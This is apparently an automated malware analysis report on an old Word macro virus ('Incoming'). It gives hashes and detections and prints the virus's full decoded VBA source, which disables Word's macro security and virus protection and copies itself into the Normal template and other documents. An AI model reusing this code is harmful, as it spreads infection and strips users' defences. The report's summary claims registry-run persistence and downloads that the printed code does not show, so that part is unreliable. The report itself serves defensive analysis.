Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a379d8d74845c888…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 41.0 KB
Created: 1999-09-16 05:12:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 6d9c915a5cda3020a36155c450be06b0
SHA-1: 69fc6cf26da2a5914ec5f81b683247cae98f234a
SHA-256: a379d8d74845c888c75a60327787f35781c7f400c8e2068b96464c8f653eec7f
Risk score: 180

Malware Insights

MITRE ATT&CK techniques
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word document containing VBA macros, as indicated by multiple heuristic firings including ClamAV detections for 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Cash-1'. The 'Document_Open' macro attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy. The macro also manipulates Office security settings to facilitate its execution and potentially download additional payloads, though the full extent is truncated. The document body presents a benign-looking code snippet to lure the user into enabling macros.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1894 bytes
SHA-256: 5572a85d807a0d5acbcd3a21e77530da2c6031288cde963499730423892e918d
Detection: ClamAV: Doc.Trojan.Cash-1
Obfuscation or payload: unlikely

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Incoming"
Attribute VB_Base = "1Normal.Incoming"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
 On Error Resume Next
 Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule
 yup = Word.ActiveDocument.Characters.Count: s = "'" + Str(yup)
 ab.replaceline 27, s
End Sub
Private Sub Document_Close()
 On Error Resume Next
 If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then: CommandBars("Macro").Controls("Security...").Enabled = 0: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
 Options.ConfirmConversions = 0
 Options.SaveNormalPrompt = 0
 Options.VirusProtection = 0
 CommandBars("Tools").Controls("Macro").Enabled = 0
 Set d = New DataObject
 Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule
 Set c = ActiveDocument.VBProject.VBComponents(1): Set cd = c.CodeModule
 d.SetText Incoming.VBProject.VBComponents(1).CodeModule.lines(1, Incoming.VBProject.VBComponents(1).CodeModule.countoflines)
 If Not a.Name = "Incoming" Then
  ab.deletelines 1, ab.countoflines: ab.insertlines 1, d.GetText: a.Name = "Incoming"
 ElseIf Not c.Name = "Incoming" Then
  cd.deletelines 1, cd.countoflines: cd.insertlines 1, d.GetText: c.Name = "Incoming"
  If Day(Now) = 16 Then: MsgBox "Chaos," & vbCr & "Panic," & vbCr & "Disorder," & vbCr & "My work here is done!!", vbOKOnly, "Incoming"
 End If
 yup = Word.ActiveDocument.Characters.Count: s2 = "'" + Str(yup)
 If ab.lines(27, 1) = s2 Then: ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' 1236
' Word 97/2K Incoming [ Psyclone X /DVC ]